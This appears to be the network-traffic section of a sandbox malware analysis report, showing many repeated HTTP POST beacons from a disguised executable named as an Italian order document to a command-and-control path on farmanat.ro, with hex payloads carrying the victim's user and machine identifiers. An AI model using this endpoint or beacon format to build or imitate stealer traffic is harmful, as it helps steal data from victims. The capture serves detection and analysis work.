                                              Nov 25, 2021 10:52:48.019784927 CET7075OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:48.054059982 CET7076OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:48.105878115 CET7076INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              549192.168.11.2050393176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:48.541433096 CET7077OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:48.575031996 CET7077OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:48.624253988 CET7077INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              55192.168.11.2049891176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:36.820807934 CET6386OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:36.854347944 CET6386OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:36.904438019 CET6386INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              550192.168.11.2050394176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:49.054536104 CET7078OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:49.088676929 CET7078OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:49.138618946 CET7079INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:48 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              551192.168.11.2050395176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:49.554647923 CET7079OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:49.588211060 CET7079OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:49.638241053 CET7080INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:48 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              552192.168.11.2050396176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:50.100164890 CET7081OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:50.133907080 CET7081OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:50.190781116 CET7081INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              553192.168.11.2050397176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:50.619972944 CET7082OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:50.654148102 CET7082OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:50.709996939 CET7083INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              554192.168.11.2050398176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:51.114068985 CET7083OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:51.147906065 CET7083OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:51.201992035 CET7084INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              555192.168.11.2050399176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:51.626205921 CET7085OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:51.659531116 CET7085OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:51.708842039 CET7085INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              556192.168.11.2050400176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:52.072016001 CET7086OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:52.106101990 CET7086OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:52.156078100 CET7087INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:51 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              557192.168.11.2050401176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:52.565167904 CET7087OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:52.598584890 CET7087OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:52.649394035 CET7088INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:51 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              558192.168.11.2050402176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:53.024229050 CET7089OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:53.058341026 CET7089OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:53.112158060 CET7089INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:52 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              559192.168.11.2050403176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:53.467348099 CET7090OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:53.501653910 CET7090OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:53.551305056 CET7090INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:52 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              56192.168.11.2049892176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:37.469780922 CET6387OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:37.503727913 CET6387OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:37.553401947 CET6388INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:36 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              560192.168.11.2050404176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:53.974143028 CET7091OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:54.007693052 CET7091OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:54.057122946 CET7092INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              561192.168.11.2050405176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:54.487405062 CET7093OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:54.521599054 CET7093OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:54.571399927 CET7093INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              562192.168.11.2050406176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:54.982707977 CET7094OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:55.016263962 CET7094OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:55.065568924 CET7094INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:54 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              563192.168.11.2050407176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:55.566183090 CET7096OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:55.599354029 CET7096OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:55.648091078 CET7096INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:54 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              564192.168.11.2050408176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:52:56.047377110 CET7097OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:52:56.080729008 CET7097OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:52:56.129972935 CET7098INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:52:55 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
